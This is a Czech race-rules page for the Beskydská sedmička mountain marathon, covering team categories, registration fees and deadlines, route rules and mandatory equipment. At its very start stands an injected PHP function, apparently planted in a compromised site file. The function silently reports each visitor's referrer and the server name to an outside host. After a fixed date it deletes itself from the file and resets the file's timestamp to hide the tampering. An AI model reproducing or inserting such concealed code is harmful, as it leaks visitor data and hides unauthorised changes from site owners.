check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } PRAVIDLA ZÁVODU
           
www.continental.cz
PRAVIDLA ZÁVODU


Pravidla a propozice závodu B7


Beskydská sedmička (dále jen B7) – eXtrémní přechod Beskyd Javorový - Javorník a Mistroství České Republiky v horském maratonu dvojic (dále jen MČR) je závod pod křídly České asociace eXtrémních sportů (dale jen ČAES)

PRAVIDLA ZÁVODU

Rozdělení startujících do kategorii

1a) B7 je eXtrémní sportovní akce, ve které mohou startovat jen osoby starší 15 let a v hlídce (týmu) musí být vždy min. 1 osoba starší 18 let, která přebírá plnou odpovědnost za nezletilého závodníka (osoba mladší 18 let musí předložit souhlas rodiče či zákonného zástupce)

1b) Hlídky (týmy) si sami a čestně zvolí svou věkovou, pohlavní a výkonnostní kategorii SPORT (MČR) nebo HOBBY ( kat. SPORT je naprosto volná, free kategorie určena všem lidem, hobíkům a povinná registrovaným sportovcům v klubech a svazech vedenými pod ČSTV jako je Adventure Race, MTB, Cyklistika, Triatlon, Orientační Běh, Atletika, Gymnastika, Plavání, Hokej, Fotbal, Ragby, Florbal, Házená, Košíková, Veslovaní, Kulturistika a jiné, kategorie HOBBY je zakázána registrovaným sportovcům a určena široké sportovní a laické veřejnosti bez registrace v oddílech a tato kategorie není řazena pod MČR)

1c) Trojčlenná jakož i dvojčlenná hlídka muže startovat pouze v kategorii HOBBY, kategorie SPORT je pouze pro dvoučlenné týmy z důvodu regulérnosti sportovní soutěže a vyhlášení mistrovského titulu, převzetí trofejí a finanční odměny atd. (podmínka statutu MČR)

1d) Hlídka (tým) je dvojice nebo trojice závodníku libovolně složena z pohlaví a věku s minimálně jednou plnoletou osobou, která je vždy kapitán týmu

1e) Věkové kategorie hlídek jsou : do 40 let, od 40 do 50 let, nad 50 let
(hlídka se řadí do své věkové kategorie podle nejstaršího člena v týmu s datumem narození k datumu startu přesně)

1f) Kategorie podle pohlaví – muži, ženy, Mix
(hlídka se řadí do své pohlavní kategorie podle vzhledu a datumu operace přesně :-)


SYSTÉM REGISTRACE

Registrace v období 1.1.2012 až 30.6.2012 (první vlna s tričkem B7) stojí 595 kč.
Registrace se stává platnou až v okamžiku zaplacení startovného, kdy se spáruje variabilní symbol platby s rodným číslem kapitána týmu.
(V seznamu registrací pole týmu svítí zeleně a v poslední buňce je zobrazeno ANO)

Lhůta pro zaplacení startovného v daném období je přesně 60 dní. Pokud se do této doby platba s žádostí o registraci nespáruje, tým se automaticky smaže z databáze a je nutno vyplnit formulář znovu, kdy opět běží lhůta 2 měsíců.
(Když najedete myší na název týmu, objeví se přesné datum a čas žádosti o registraci, od které běží daná lhůta pro zaplacení.)

V první vlně registrace mohou toto udělat váhavci a spekulanti celkem 3x.
ZDŮVODNĚNÍ: V loňském ročníku B7 se nám hojně stávalo, že se lidé registrují pouze z hecu a z jakési Image aby se viděli na webu extrémní akce a blokovali startovní místa opravdovým zájemcům o start v závodě.

Registrace v období 1.7.2012 až 31.7.2012 (druhá vlna bez trička B7) stojí 695 kč. Lhůta pro zaplacení startovného v daném období je přesně 14 dní. Pokud se do této doby platba s žádostí o registraci nespáruje, tým se automaticky smaže z databáze a je nutno vyplnit formulář znovu, kdy opět běží lhůta dvou týdnů.
V druhé vlně registrace mohou toto udělat váhavci a spekulanti celkem 2x.

Registrace v období 1.8.2012 až 20.8.2012 (třetí vlna bez trička B7) stojí 795 kč.
Lhůta pro zaplacení startovného v daném období je přesně 3 dny. Pokud se do této doby platba s žádostí o registraci nespáruje, tým se automaticky smaže z databáze a je nutno vyplnit formulář znovu, kdy opět běží lhůta tří dnů. V třetí vlně má tým rovněž 2 pokusy o registraci.

POŘADATEL ZÁVODU SI VYHRAZUJE PRÁVO REGISTRACI UZAVŘÍT NEBO UPRAVIT PODMÍNKY REGISTRACE POKUD TO BUDE VYŽADOVAT SITUACE
(např. naplnění limitu závodníků)


ZÁKLADNÍ PRAVIDLA POSTUPU

2a) Hlídka vychází pešky z místa Startu a chce dojít co nejdál po trase B7 pokud možno až do cíle přes kontrolní vrcholy bez cizí pomoci ve stanoveném časovém limitu 30 hodin!

2b) Rychlost pohybu, strategii odpočinku, jídla a spánek si volí hlídka sama podle aktuální fyzické a psychické situace!!

2c) Hlídka muže využít k postupu pouze své vlastní fyzické a psychické síly a vzájemná pomoc pouze v rámci vlastní hlídky (jsou doporučeny trekové hole a brufen)

2d) Hlídka v kategorii Sport nesmí použít cizí pomoc a musí dokončit závod s původním vybavením, se kterým odstartoval (boty, hole, oblečení)

2e) Hlídka musí být po celou dobu závodu identifikovatelná viditelně umístěným startovním číslem na batohu či oděvu a každý závodník musí mít nepoškozený identifikační pasek na ruce, ktery sendává až po vyhlašení vítězů a vylosování tomboly, případně po vydání zavazadel z uschovy.

2f) Každá hlídka musí projít na trase B7 všemi snímacími a kontrolními koberci na vrcholech a občerstvovacích stanovištích (tým dostane na registraci před startem čipové zařízení pro elektronické měření oproti vratné záloze 300 kč v cíli)

2g) Hlídka postupuje po turistických značkách a zpevněných lesních cestách podle pevně stanovené a značené trasy B7
k navigaci smí použít jakoukoli mapu, buzoly, kompas nebo GPS navigaci

2h) Je zakázáno použík k přesunu cizí předmet (automobil, motocykl, traktor, kolo, brusle, skateboard, jezdecký kun, osel, mula, mezek, a jiné doprvní prostředky)

2i) Závodník musí být registrován na internetu a platí startovné předem

2j) Týmy v kategorii HOBBY smějí absolvovat celou trasu B7 sport a bojovat tak o titul Mistr české republiky v eXtrémním horském maratonu dvojic.!

Trasa B7 vede přes 7 hlavních vrcholu Beskyd s výškou nad 1 km.!
Beskydské vrcholy jsou seřazeny takto:
Malý Javorový 945m, Velký Javorový 1031 m, Ropice 1082m, Travný 1203 m, Lysá Hora 132 m, Smrk 1276 m, Čertuv mlýn 1205 m, Tanečnica 1084m, Radhošt 1129 m, Velký Javorník 918m

3a) Do závodu smí nastoupit pouze závodníci registrovaní na oficiálních stránkách závodu Beskydskasedmička.cz kteří mají řádně zaplacené startovné, jsou označení identifikátory závodu B7 (ID náramek, startovní číslo na batohu či svrchním oděvu, (vždy viditelné) registrovaný ID čip

3b) zaplacené startovné se nevrací, dá se pouze směnit, prodat či převést na jiný tým,
k tomu slouží především beskydská seznamka

3c) Do závodu smí nastoupit pouze závodníci, kteří splnují bez výhrady pravidla závodu, jsou v dobrém zdravotním stavu, nejsou pod vlivem alkoholu, drog a jiných omamných látek (pořadatel si vyhrazuje právo nepustit na start nebo zastavit v závodě každého závodníka, který bude vykazovat přílišné známky únavy či vyčerpání a kde bude hrozit zásadním způsobem ohrožení jeho zdraví.

3d) Pořadatel si vyhrazuje právo kdykoli zastavit závod nebo reagovat na nepředvídatelné situace aby zajistil bezpečnost všech závodníků
(náhlá prudká změna počasí, bouřka, vichřice, větrný polom, útok šelmy a podobně

3e) Tým, který nestíhá procházet v limitu časovými bránami musí ukončit účast v závodě

3f) Každý závodník má právo na bezplatný nocleh a úschovnu zavazadel v BC Frenštát p. R. (karimatka, spacak, nahradní oblečení)

POVINNÁ VÝBAVA

Každý závodník v týmu musí mít u sebe:

1. Plně nabitý funkční telefon ve vyplém stavu kvůli úspoře baterií
1a. Nepromokavý obal na telefon (nejlepší je kondom :-)

2. NRC alufolie (na podchlazení)

3. náhradní baterie do čelovek (nepoužívejte dobíjecí ale kvalitní jednorázové – alkalické, někteří pujdete 2 noci)

4. náplasti na puchýře (hooodně, moc)

5. elastické obinadlo

6. analgetikum (brufen, algifen, ibalgin, tramal, atd – o volbě léku a množstvím užití se poraďte se svým lékařem!!!)

7. náhradní čelovka 1 kus na tým (zodpovídá kapitán)

8. Finanční hotovost na jídlo a případný Taxík

9. Pytlík na odpadky


Vše z povinné výbavy po případném použití nezahazujte, ale mějte u sebe v batohu, i prázdné obaly od léků.

Doporučena je Vazelína a náhradní ponožky.!!! velmi důležité! 40% lidí co nedojdou cíle je z důvodů rozedřeného rozkroku a prstů na nohou, a přitom stačí si jen dobře namazat nohy vazelinou, ostříhat nehty a máte klid. Ale vime že i letos se najdou takoví, co pujdou nasucho a pak se diví, že trpí jako zvířata.

Doporučujeme mít aktivován Roaming, nebot na hřebenech Beskyd jsou místa, kde je slabý signál českých operátorů a naskakují polské a slovenské sítě.
Dále pokud můžete volit v týmu, mějte raději kombinaci dvou operátorů (O2 + Vodafone či T-mobile, posledně jmenovaný je na tom asi nejhůře se signálem, protože ho mám sám :-) )

Pozor! Nemáme šanci zkontrolovat u všech 2700 závodníků povinnou výbavu před startem. Pořadatelé mohou kdekoli na trati B7 zkontrolovat komukoli její úplnost. Při nedodržení seznamu Povinné výbavy (PV) bude celý tým bez diskuze diskvalifikován.!

Toto přísné nařízení je nezbytné proto, abychom vás přinutili mít vše co požadujeme v PV. Může to pomoct nejen vám, ale i jiným v nouzi.
Přihlásili jste se do eXtrémního závodu, kde hrozí úrazy, zranění a stavy krajního vyčerpání podobně jako na osmitisícovce. Předloni jsme kvůli nezodpovědnosti některých jedinců museli předčasně ukončit závod a horská služba měla co dělat, aby ztracené závodníky bez mobilu vůbec našla.